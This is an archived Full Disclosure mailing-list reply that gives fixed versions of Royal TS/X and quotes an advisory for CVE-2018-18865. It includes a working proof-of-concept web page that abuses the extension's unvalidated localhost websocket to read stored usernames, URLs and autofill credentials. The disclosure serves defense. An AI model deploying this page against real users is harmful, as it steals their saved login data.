lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <CALxzxN1A9Ohi3BN1fEZD2XjEVs4PdzAPCxfNwZwJDsS8oVENbQ@mail.gmail.com>
Date: Sun, 4 Nov 2018 09:30:01 +0100
From: Jakub Palaczynski <jakub.palaczynski@...il.com>
To: fulldisclosure@...lists.org
Subject: Re: [FD] Royal TS/X - Information Disclosure

Hello,

I would like to inform that actual fix for this vulnerability was released
in versions:

- Royal TSX (for macOS) 3.3.1 - Release Date: 2018-09-13
- Royal TS (for Windows) 4.3.60728 - Release Date: 2018-07-28

Kind regards
Jakub Palaczynski

śr., 31 paź 2018, 06:43: Jakub Palaczynski <jakub.palaczynski@...il.com>
napisał(a):

> Title: Royal TS/X - Information Disclosure
> Author: Jakub Palaczynski
> Date: 10. July 2018
> CVE: CVE-2018-18865
>
> Affected product:
> =============
>
> Royal TS/X < Royal TS v5 Beta / Royal TSX v4 Beta
>
>
> Vulnerability - Information Disclosure:
> =============================
>
> Any third party web application can steal credentials created in Royal
> TS/X when browser extension is enabled.
> Browser extension communicates using websockets (default TCP port 54890)
> and websockets do not use any validation to verify origin of the request.
>
>
> PoC website:
> ==========
>
>   <!DOCTYPE html>
>   <meta charset="utf-8" />
>   <title>RoyalTS/X Exploit</title>
>   <script language="javascript" type="text/javascript">
>
>   var wsUri = "ws://127.0.0.1:54890/";
>   var output;
>
>   function init()
>   {
>     output = document.getElementById("output");
>     testWebSocket();
>   }
>
>   function testWebSocket()
>   {
> writeToScreen("Let's retrieve some data...");
>     websocket = new WebSocket(wsUri);
>     websocket.onopen = function(evt) {
> onOpen(evt,"{\"Command\":\"GetDocuments\",\"Arguments\":null,\"PluginVersion\":\"1.0.0.0\",\"RequestId\":\"aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa\"}")
> };
>     websocket.onclose = function(evt) { onClose(evt) };
>     websocket.onmessage = function(evt) { onMessage(evt) };
>     websocket.onerror = function(evt) { onError(evt) };
>   }
>
>   function onOpen(evt,message)
>   {
>     doSend(message);
>   }
>
>   function onClose(evt)
>   {
>   }
>
>   function onMessage(evt)
>   {
> var obj = JSON.parse(evt.data);
> if (obj['Command'] == "GetDocuments") {
> for (var x in obj['ResponseData']){
> writeToScreen("Name: " + obj['ResponseData'][x]['Name']);
> writeToScreen("Unlocked: " + obj['ResponseData'][x]['Unlocked']);
> for (var y in obj['ResponseData'][x]['Credentials']){
> writeToScreen("Username: " +
> obj['ResponseData'][x]['Credentials'][y]['UserName']);
> writeToScreen("URL: " + obj['ResponseData'][x]['Credentials'][y]['URL']);
> if (obj['ResponseData'][x]['Unlocked'] == true){
> websocket.close();
> websocket = new WebSocket(wsUri);
> websocket.onopen = function(evt) {
> onOpen(evt,"{\"Command\":\"GetLoginInformation\",\"Arguments\":{\"CredentialId\":\""
> + obj['ResponseData'][x]['Credentials'][y]['ID'] +
> "\"},\"PluginVersion\":\"1.0.0.0\",\"RequestId\":\"aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa\"}")
> };
> websocket.onclose = function(evt) { onClose(evt) };
> websocket.onmessage = function(evt) { onMessage(evt) };
> websocket.onerror = function(evt) { onError(evt) };
> }
> }
> }
> }
> else {
> if (obj['Command'] == "GetLoginInformation") {
> var obj = JSON.parse(evt.data);
> writeToScreen("AutoFill Data: " + atob(obj['ResponseData']));
> }
> }
>   }
>
>   function onError(evt)
>   {
>     writeToScreen('<span style="color: red;">ERROR:</span> ' + evt.data);
>   }
>
>   function doSend(message)
>   {
>     websocket.send(message);
>   }
>
>   function writeToScreen(message)
>   {
>     var pre = document.createElement("p");
>     pre.style.wordWrap = "break-word";
>     pre.innerHTML = message;
>     output.appendChild(pre);
>   }
>
>   window.addEventListener("load", init, false);
>
>   </script>
>
>   <h2>RoyalTS/X Exploit</h2>
>
>   <div id="output"></div>
>
>
> Contact:
> =======
>
> Jakub[dot]Palaczynski[at]gmail[dot]com
>
>

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ